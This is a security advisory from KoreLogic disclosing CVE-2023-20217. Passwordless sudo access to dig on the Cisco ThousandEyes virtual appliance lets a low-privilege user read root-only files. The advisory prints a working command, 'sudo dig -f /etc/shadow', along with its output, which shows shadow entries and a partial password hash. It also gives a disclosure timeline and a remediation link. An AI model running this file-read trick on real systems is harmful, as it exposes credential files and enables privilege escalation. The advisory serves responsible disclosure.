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Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Read

2023-08-1800:00:00
Hank Leininger, Jim Becher, korelogic.com
packetstormsecurity.com
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cisco
thousandeyes
virtual appliance
arbitrary file read
insecure sudo configuration
ubuntu 18.04
cve-2023-20217
dig command

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`KL-001-2023-001: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Read via sudo dig  
  
Title: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Read via sudo dig  
Advisory ID: KL-001-2023-001  
Publication Date: 2023.08.17  
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-001.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: ThousandEyes  
Affected Product: ThousandEyes Enterprise Agent Virtual Appliance  
Affected Version: thousandeyes-va-64-18.04 0.218  
Platform: Linux / Ubuntu 18.04  
CWE Classification: CWE-1395: Dependency on Vulnerable  
Third-Party Component,  
CWE-1220: Insufficient Granularity of  
Access Control  
CVE ID: CVE-2023-20217  
  
  
2. Vulnerability Description  
  
An insecure sudo configuration permits a low-privilege user  
to read root-only files via the 'dig' command without a  
password.  
  
  
3. Technical Description  
  
The ThousandEyes Virtual Appliance is distributed with a  
restrictive set of commands that can be executed via sudo,  
without having to provide the password for the 'thousandeyes'  
account. However, the ability to execute dig via sudo,  
allows for reading of arbitrary files using dig's "batch"  
mode. This mode allows a user to specify a file of requests,  
one per line. The dig command will read the file with elevated  
privileges and display the resulting queries (i.e. file  
contents) back to the user.  
  
thousandeyes@thousandeyes-va:~$ id  
uid=1000(thousandeyes) gid=1000(thousandeyes)   
groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)  
thousandeyes@thousandeyes-va:~$ sudo -l  
Matching Defaults entries for thousandeyes on thousandeyes-va:  
env_reset, mail_badpass,   
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin  
  
User thousandeyes may run the following commands on thousandeyes-va:  
(ALL : ALL) ALL  
(ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va,   
/bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop  
te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start   
te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart  
te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig,   
/usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent,  
/usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa,   
/usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install  
te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate,   
/usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*  
(root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump  
  
Here we see that dig is available as root with no password,  
and no restrictions on the arguments it can be passed.  
  
thousandeyes@thousandeyes-va:~$ sudo /usr/bin/dig -f /etc/shadow  
  
; <<>> DiG 9.11.3-1ubuntu1.17-Ubuntu <<>> root:!:19145:0:99999:7:::  
;; global options: +cmd  
;; Got answer:  
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 40036  
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1  
  
;; OPT PSEUDOSECTION:  
; EDNS: version: 0, flags:; udp: 65494  
;; QUESTION SECTION:  
;root:!:19145:0:99999:7:::. IN A  
  
;; Query time: 0 msec  
;; SERVER: 127.0.0.53#53(127.0.0.53)  
;; WHEN: Fri Mar 31 08:00:38 UTC 2023  
;; MSG SIZE rcvd: 54  
  
; <<>> DiG 9.11.3-1ubuntu1.17-Ubuntu <<>> daemon:!*:18885:0:99999:7:::  
;; Got answer:  
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 32743  
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1  
  
;; OPT PSEUDOSECTION:  
; EDNS: version: 0, flags:; udp: 65494  
;; QUESTION SECTION:  
;daemon:!*:18885:0:99999:7:::. IN A  
...  
;thousandeyes:$6$qvB7Zfsh1fFCuBM9$l3X3Gj/7v.IY54N5YMFj5hpd.Fb...  
...  
  
  
4. Mitigation and Remediation Recommendation  
  
The vendor has released a version which remediates the described  
vulnerability. Release notes are available at:  
  
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-te-va-priv-esc-PUdgrx8E  
  
  
5. Credit  
  
This vulnerability was discovered by Jim Becher and Hank  
Leininger of KoreLogic, Inc.  
  
  
6. Disclosure Timeline  
  
2023.04.26 - KoreLogic submits vulnerability details to Cisco.  
2023.04.26 - Cisco acknowledges receipt and the intention to  
investigate.  
2023.05.04 - Cisco notifies KoreLogic that a remediation for this  
vulnerability is expected to be available within  
90 days.  
2023.06.30 - 45 business days have elapsed since KoreLogic reported  
this vulnerability to the vendor.  
2023.07.11 - Cisco informs KoreLogic that the issue has been  
remediated in the latest ThousandEyes Virtual  
Appliance and a public advisory will be released  
2023.08.16.  
2023.07.24 - 60 business days have elapsed since KoreLogic reported  
this vulnerability to the vendor.  
2023.08.09 - Cisco provides KoreLogic with CVE-2023-20217 to  
track this vulnerability.  
2023.08.16 - Cisco public acknowledgement.  
2023.08.17 - KoreLogic public disclosure.  
  
  
7. Proof of Concept  
  
See 3. Technical Description.  
  
  
The contents of this advisory are copyright(c) 2023  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt  
  
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